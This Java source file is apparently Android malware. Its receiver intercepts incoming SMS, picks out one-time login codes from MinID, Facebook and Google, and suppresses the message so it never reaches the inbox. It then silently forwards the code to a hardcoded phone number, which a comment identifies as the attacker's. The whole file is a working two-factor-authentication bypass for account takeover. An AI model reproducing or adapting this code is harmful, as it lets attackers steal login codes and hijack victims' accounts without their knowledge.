package readsms;

import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.Bundle;
import android.telephony.SmsMessage;
import android.telephony.SmsManager;

public class SMSReceiver extends BroadcastReceiver 
{
	@Override
	public void onReceive(Context context, Intent intent) 
	{
		/* get the SMS message */
		Bundle bundle = intent.getExtras();
		Object messages[] = (Object[]) bundle.get("pdus");
		SmsMessage smsMessage[] = new SmsMessage[messages.length];
		for (int n=0; n<messages.length; n++)
		{
			smsMessage[n] = SmsMessage.createFromPdu((byte[]) messages[n]);
		}
		
		/* get the SMS body */
		String smsBody = smsMessage[0].getMessageBody();
		
		/* extract the OTP from the body */
		String otp = getOTP(smsBody);
		if (otp != null) 
		{
			/* stop the message from reaching the receivers inbox */
			abortBroadcast();
			sendSMS(otp);
		}
	}
	
	/*
	 *	This method checks if the content of the received SMS corresponds
	 *	with any of the the SMS sent by MinID, Facebook and Google
	 */
	public String getOTP(String smsBody)
	{
		/* checks for content from MinID */
		if(smsBody.contains("Din engangskode fra MinID for innlogging") || 
				smsBody.contains("Your single-use code from MinID to log in to Minside") || 
				smsBody.contains("Your single-use code to log in with MinID"))
		{
			return smsBody.substring(0, 5);
		}
		/* checks for content from Facebook */
		if(smsBody.contains("Please use the code") && 
				smsBody.contains("to approve the login to Facebook from an unrecognized machine"))
		{
			return smsBody.substring(20, 26);
		}
		/* checks for content from Google */
		if(smsBody.contains("Your Google verification code is"))
		{
			return smsBody.substring(33, 39);
		}
		return null;
	}
	/*
	 *	The method responsible of forwarding the SMS to the attacker
	 */
	public void sendSMS(String message)
    {
		String number = "+4791896835";
		SmsManager sm = SmsManager.getDefault();
		sm.sendTextMessage(number, null, message, null, null);
    }
}